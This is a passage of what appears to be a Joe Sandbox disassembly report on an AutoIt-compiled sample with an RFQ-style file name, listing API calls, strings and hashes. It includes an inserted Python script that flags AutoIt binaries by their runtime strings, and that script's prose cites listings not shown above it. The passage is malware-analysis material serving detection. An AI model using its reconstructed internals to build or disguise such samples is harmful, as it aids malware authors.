                                              • Opcode ID: 8dca1ea71f7a1fe5b456df24c0a83092e36f1a9dc3342db63ddf7adf7cd74ea5
                                              • Instruction ID: b944bee3a9a114770bbfb711d2c69469ff6e784d888072d9d12284280a21ac14
                                              • Opcode Fuzzy Hash: 8dca1ea71f7a1fe5b456df24c0a83092e36f1a9dc3342db63ddf7adf7cd74ea5
                                              • Instruction Fuzzy Hash: 3651A230688345ABCF08DB50EDE39BD73B1AF54B417614019F40AA72B1C776ED4ADB82
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp
                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 1038674560-86951937
                                              • Opcode ID: 05d7272acd1b892f8806bb63476ebf2b1144a3f88b05db46290c82ce872be086
                                              • Instruction ID: 8273344b4222f1d8101ec7e845055e781cf0d2d5d8929e3903a021171ed44844
                                              • Opcode Fuzzy Hash: 05d7272acd1b892f8806bb63476ebf2b1144a3f88b05db46290c82ce872be086
                                              • Instruction Fuzzy Hash: 9681FA70740285BEDB24AB61DC82FFE77A8AF24740F084035FD45BB1C2EB61DA95C6A1
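The three listings above (the "AutoIt v3" window bootstrap, the DriveGetType bus-name table with "1394", "FileBackedVirtual", "PhysicalDrive" and "\\.\", and the pre-processor that recognises "#include", "#requireadmin", "#OnAutoItStartRegister" and friends) are strings carried by the AutoIt v3 runtime itself, which is why the report classifies the sample as a compiled AutoIt script. The following Python triage check is an added example and not part of the sandbox report: it searches a file image for that string set in both UTF-16LE (AutoIt is a Unicode build, so these are wide strings in the binary) and ASCII. The indicator list is copied from the String IDs on this page; the function names, the hit-count threshold and the embedded sample bytes are this example's own assumptions.

```python
"""Triage check for AutoIt-compiled PE files, keyed on the runtime strings
recovered in the function listings above.  Added example; not part of the
sandbox report.  The indicator list comes from the report's String IDs; the
decision threshold and the sample data below are this example's own choices."""

# Strings the AutoIt v3 runtime carries, grouped by the function that uses them:
# the splash/progress GUI bootstrap, the DriveGetType bus-name table, and the
# script pre-processor's directive keywords and error messages.
AUTOIT_INDICATORS = {
    "AutoIt v3":                     "main window title passed to CreateWindowExW",
    "msctls_progress32":             "progress-bar class used by the GUI bootstrap",
    "#OnAutoItStartRegister":        "pre-processor directive",
    "#requireadmin":                 "pre-processor directive",
    "#notrayicon":                   "pre-processor directive",
    "#include-once":                 "pre-processor directive",
    "#pragma compile":               "pre-processor directive",
    "Bad directive syntax error":    "pre-processor error text",
    "Cannot parse #include":         "pre-processor error text",
    "Unterminated group of comments": "pre-processor error text",
    "FileBackedVirtual":             "DriveGetType bus-name table entry",
    "PhysicalDrive":                 "DriveGetType bus-name table entry",
}


def find_indicators(data: bytes) -> dict:
    """Return {indicator: [(encoding, offset), ...]} for every indicator found.

    Each string is searched as UTF-16LE first (how the Unicode AutoIt build
    stores it) and then as ASCII, in case a packer or dumper narrowed it."""
    hits: dict = {}
    for text in AUTOIT_INDICATORS:
        for enc in ("utf-16-le", "ascii"):
            needle = text.encode(enc)
            pos = data.find(needle)
            while pos != -1:
                hits.setdefault(text, []).append((enc, pos))
                pos = data.find(needle, pos + 1)
    return hits


def is_likely_autoit(data: bytes, min_hits: int = 3) -> bool:
    """Verdict: at least min_hits distinct indicators are present.

    The threshold is an assumption for this example; "#include" on its own
    would match C source, so single hits are deliberately not enough."""
    return len(find_indicators(data)) >= min_hits


# Constructed sample: a few of the indicators embedded as UTF-16LE between
# filler bytes, standing in for a slice of a compiled-script image.
SAMPLE_AUTOIT = (
    b"\x00" * 16
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + "#requireadmin".encode("utf-16-le") + b"\x00\x00"
    + "#notrayicon".encode("utf-16-le") + b"\x00\x00"
    + "FileBackedVirtual".encode("utf-16-le") + b"\x00\x00"
    + b"MZ\x90\x00" * 4
)

# Constructed control: ordinary PE stub text with none of the indicators.
SAMPLE_BENIGN = b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 64


if __name__ == "__main__":
    import sys

    # Pass a file path to scan a real image; with no argument the built-in
    # constructed sample is scanned.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_AUTOIT
    for name, where in sorted(find_indicators(blob).items()):
        print(f"{name!r:36} {AUTOIT_INDICATORS[name]} at {where[:3]}")
    print("likely AutoIt-compiled:", is_likely_autoit(blob))
```

Run it against the dumped image (the 000E0000-based memory dump listed under Memory Dump Source) rather than the packed file on disk if the on-disk sample is compressed; the strings are only guaranteed to be contiguous once the runtime is unpacked in memory.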
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00168D34
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00168D45
                                              • CharNextW.USER32(0000014E), ref: 00168D74
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00168DB5
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00168DCB
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00168DDC
                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00168DF9
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00168E45
                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00168E5B
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00168E8C
                                              • _memset.LIBCMT ref: 00168EB1
                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00168EFA
                                              • _memset.LIBCMT ref: 00168F59
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00168F83
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00168FDB
                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00169088
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 001690AA
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001690F4
                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00169121
                                              • DrawMenuBar.USER32(?), ref: 00169130
                                              • SetWindowTextW.USER32(?,0000014E), ref: 00169158
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                              • String ID: 0$@U=u
                                              • API String ID: 1073566785-975001249
                                              • Opcode ID: fcb5e19d2d71611462ea78d5c11ef9ed11eb738f63e898863e4dce05b4524894
                                              • Instruction ID: fff263f4b18799d48af83e5e0867016f778daca935f425f8a8fc127d01959814
                                              • Opcode Fuzzy Hash: fcb5e19d2d71611462ea78d5c11ef9ed11eb738f63e898863e4dce05b4524894
                                              • Instruction Fuzzy Hash: 2FE18370900219ABDF20DF94DC88EFE7B79EF15710F108259F915AA1E1DB708A92DF60
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00164C51
                                              • GetDesktopWindow.USER32 ref: 00164C66
                                              • GetWindowRect.USER32(00000000), ref: 00164C6D
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00164CCF
                                              • DestroyWindow.USER32(?), ref: 00164CFB
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00164D24
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00164D42
                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00164D68
                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00164D7D
                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00164D90
                                              • IsWindowVisible.USER32(?), ref: 00164DB0
                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00164DCB
                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00164DDF
                                              • GetWindowRect.USER32(?,?), ref: 00164DF7
                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00164E1D
                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00164E37
                                              • CopyRect.USER32(?,?), ref: 00164E4E
                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00164EB9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                              • String ID: ($0$tooltips_class32
                                              • API String ID: 698492251-4156429822
                                              • Opcode ID: ba7a2af5dcf41d4773d79fe16e7d5205bc9ea3049959dd60e1d77b225fc05a24
                                              • Instruction ID: c98d6533ea2300194b4711d59c23c9ba29ac6b6b40c00b11e3a5002a9e3d0ea8
                                              • Opcode Fuzzy Hash: ba7a2af5dcf41d4773d79fe16e7d5205bc9ea3049959dd60e1d77b225fc05a24
                                              • Instruction Fuzzy Hash: C5B16871608341AFDB04DF65DC48B6ABBE4BF88310F00891DF999AB2A2D771EC55CB91
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001446E8
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0014470E
                                              • _wcscpy.LIBCMT ref: 0014473C
                                              • _wcscmp.LIBCMT ref: 00144747
                                              • _wcscat.LIBCMT ref: 0014475D
                                              • _wcsstr.LIBCMT ref: 00144768
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00144784
                                              • _wcscat.LIBCMT ref: 001447CD
                                              • _wcscat.LIBCMT ref: 001447D4
                                              • _wcsncpy.LIBCMT ref: 001447FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 699586101-1459072770
                                              • Opcode ID: aa7144bb229253f1d634a9cceeee44631d3096cba13e46a0f6c41bbc08b1ad68
                                              • Instruction ID: bf2995d1c6756b7b644d7574e9f40203adb50703cde985b6a7572ee659e6ea53
                                              • Opcode Fuzzy Hash: aa7144bb229253f1d634a9cceeee44631d3096cba13e46a0f6c41bbc08b1ad68
                                              • Instruction Fuzzy Hash: F0413872A002057BEB10B7B49C47FBF77ACEF55710F10006AF984E71D2EBB49A0296A5
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000E28BC
                                              • GetSystemMetrics.USER32(00000007), ref: 000E28C4
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000E28EF
                                              • GetSystemMetrics.USER32(00000008), ref: 000E28F7
                                              • GetSystemMetrics.USER32(00000004), ref: 000E291C
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000E2939
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000E2949
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000E297C
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000E2990
                                              • GetClientRect.USER32(00000000,000000FF), ref: 000E29AE
                                              • GetStockObject.GDI32(00000011), ref: 000E29CA
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 000E29D5
                                                • Part of subcall function 000E2344: GetCursorPos.USER32(?), ref: 000E2357
                                                • Part of subcall function 000E2344: ScreenToClient.USER32(001A67B0,?), ref: 000E2374
                                                • Part of subcall function 000E2344: GetAsyncKeyState.USER32(00000001), ref: 000E2399
                                                • Part of subcall function 000E2344: GetAsyncKeyState.USER32(00000002), ref: 000E23A7
                                              • SetTimer.USER32(00000000,00000000,00000028,000E1256), ref: 000E29FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: @U=u$AutoIt v3 GUI
                                              • API String ID: 1458621304-2077007950
                                              • Opcode ID: d55805f198cea255c4c816d509e5d317964f7b49746e5cb943f36419857e6acd
                                              • Instruction ID: a1950529fbf14210c1168a6c21fab359741ee773ecb3ee66eb1b657243623ca2
                                              • Opcode Fuzzy Hash: d55805f198cea255c4c816d509e5d317964f7b49746e5cb943f36419857e6acd
                                              • Instruction Fuzzy Hash: C6B1807164024AEFDB14DFA9DD45BED7BB8FB08310F148129FA26E72A0DB749881CB51
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 0013C4D4
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0013C4E6
                                              • SetWindowTextW.USER32(?,?), ref: 0013C4FD
                                              • GetDlgItem.USER32(?,000003EA), ref: 0013C512
                                              • SetWindowTextW.USER32(00000000,?), ref: 0013C518
                                              • GetDlgItem.USER32(?,000003E9), ref: 0013C528
                                              • SetWindowTextW.USER32(00000000,?), ref: 0013C52E
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0013C54F
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0013C569
                                              • GetWindowRect.USER32(?,?), ref: 0013C572
                                              • SetWindowTextW.USER32(?,?), ref: 0013C5DD
                                              • GetDesktopWindow.USER32 ref: 0013C5E3
                                              • GetWindowRect.USER32(00000000), ref: 0013C5EA
                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0013C636
                                              • GetClientRect.USER32(?,?), ref: 0013C643
                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0013C668
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0013C693
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                              • String ID: @U=u
                                              • API String ID: 3869813825-2594219639
                                              • Opcode ID: 8a9771bbc09d35443305d427daf14aaa572cd49703b8b32cd649f4ecf31ce628
                                              • Instruction ID: 487b1483a23f35af8d32eaa894304eb927e0bc012330a5f152d3e96fd35205b9
                                              • Opcode Fuzzy Hash: 8a9771bbc09d35443305d427daf14aaa572cd49703b8b32cd649f4ecf31ce628
                                              • Instruction Fuzzy Hash: 76516071A00709AFDB20DFA8DD89B6EBBF5FF04705F00492CE696A25A0D7B4A945CB50
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 001640F6
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001641B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 3974292440-1753161424
                                              • Opcode ID: 1ae1a9bbd2232991b04e07d9cfd0d162cc7b9393d3afb76f6191c24fbae749dc
                                              • Instruction ID: 805be1b0d34c4103b637b5775b93fc82a6cba47b14678d406682869e055f20fb
                                              • Opcode Fuzzy Hash: 1ae1a9bbd2232991b04e07d9cfd0d162cc7b9393d3afb76f6191c24fbae749dc
                                              • Instruction Fuzzy Hash: 6BA1A0302183419FCB18EF21CD91ABAB3A5BF94314F15496CB8A6AB3D2DB70EC15CB51
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00155309
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00155314
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0015531F
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 0015532A
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00155335
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00155340
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0015534B
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00155356
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00155361
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0015536C
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00155377
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00155382
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0015538D
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00155398
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 001553A3
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 001553AE
                                              • GetCursorInfo.USER32(?), ref: 001553BE
                                              • GetLastError.KERNEL32(00000001,00000000), ref: 001553E9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Cursor$Load$ErrorInfoLast
                                              • String ID:
                                              • API String ID: 3215588206-0
                                              • Opcode ID: c67d3395eccfae76870a44b1d41fc4333c8474da22491dc2dae8c37a8ff4d7d2
                                              • Instruction ID: 72d1debc3c0ee6468eb372aeda569969073925b20552e1fdfc8f1816357bb877
                                              • Opcode Fuzzy Hash: c67d3395eccfae76870a44b1d41fc4333c8474da22491dc2dae8c37a8ff4d7d2
                                              • Instruction Fuzzy Hash: 09415370E04319AADB109FBA8C4996EFFF8EF51B50F10452FE519EB291DBB8A401CE51
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0013AAA5
                                              • __swprintf.LIBCMT ref: 0013AB46
                                              • _wcscmp.LIBCMT ref: 0013AB59
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0013ABAE
                                              • _wcscmp.LIBCMT ref: 0013ABEA
                                              • GetClassNameW.USER32(?,?,00000400), ref: 0013AC21
                                              • GetDlgCtrlID.USER32(?), ref: 0013AC73
                                              • GetWindowRect.USER32(?,?), ref: 0013ACA9
                                              • GetParent.USER32(?), ref: 0013ACC7
                                              • ScreenToClient.USER32(00000000), ref: 0013ACCE
                                              • GetClassNameW.USER32(?,?,00000100), ref: 0013AD48
                                              • _wcscmp.LIBCMT ref: 0013AD5C
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0013AD82
                                              • _wcscmp.LIBCMT ref: 0013AD96
                                                • Part of subcall function 0010386C: _iswctype.LIBCMT ref: 00103874
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                              • String ID: %s%u
                                              • API String ID: 3744389584-679674701
                                              • Opcode ID: 0a45037661b1b258e1f8c038235356335ea3546689e4e6732c29b8e7e2d095d7
                                              • Instruction ID: c32cf9951d78dafe2144a773e86c44d2ece7736b904fab4e97f70d4956b60772
                                              • Opcode Fuzzy Hash: 0a45037661b1b258e1f8c038235356335ea3546689e4e6732c29b8e7e2d095d7
                                              • Instruction Fuzzy Hash: EBA1CD71204306AFDB18DF64C884BAAF7E8FF04315F408629F9E9D2590DB30E955CBA2
                                              APIs
                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0013B3DB
                                              • _wcscmp.LIBCMT ref: 0013B3EC
                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0013B414
                                              • CharUpperBuffW.USER32(?,00000000), ref: 0013B431
                                              • _wcscmp.LIBCMT ref: 0013B44F
                                              • _wcsstr.LIBCMT ref: 0013B460
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0013B498
                                              • _wcscmp.LIBCMT ref: 0013B4A8
                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0013B4CF
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0013B518
                                              • _wcscmp.LIBCMT ref: 0013B528
                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0013B550
                                              • GetWindowRect.USER32(00000004,?), ref: 0013B5B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                              • String ID: @$ThumbnailClass
                                              • API String ID: 1788623398-1539354611
                                              • Opcode ID: d7b2dfb2c1cf6ba9c841e5cae7112fae86d54fe230a1a6e4403042884db70041
                                              • Instruction ID: 48e216f0768b92b477850bbc83e939c3da1e8d5158708d563bbac22241d472f3
                                              • Opcode Fuzzy Hash: d7b2dfb2c1cf6ba9c841e5cae7112fae86d54fe230a1a6e4403042884db70041
                                              • Instruction Fuzzy Hash: C9818E710083059BDB15DF10D8C5FAA7BE8EF54314F08856DFE899A092EB70DE46CBA1
                                              APIs
                                              • _memset.LIBCMT ref: 0016A4C8
                                              • DestroyWindow.USER32(?,?), ref: 0016A542
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0016A5BC
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0016A5DE
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0016A5F1
                                              • DestroyWindow.USER32(00000000), ref: 0016A613
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000E0000,00000000), ref: 0016A64A
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0016A663
                                              • GetDesktopWindow.USER32 ref: 0016A67C
                                              • GetWindowRect.USER32(00000000), ref: 0016A683
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0016A69B
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0016A6B3
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
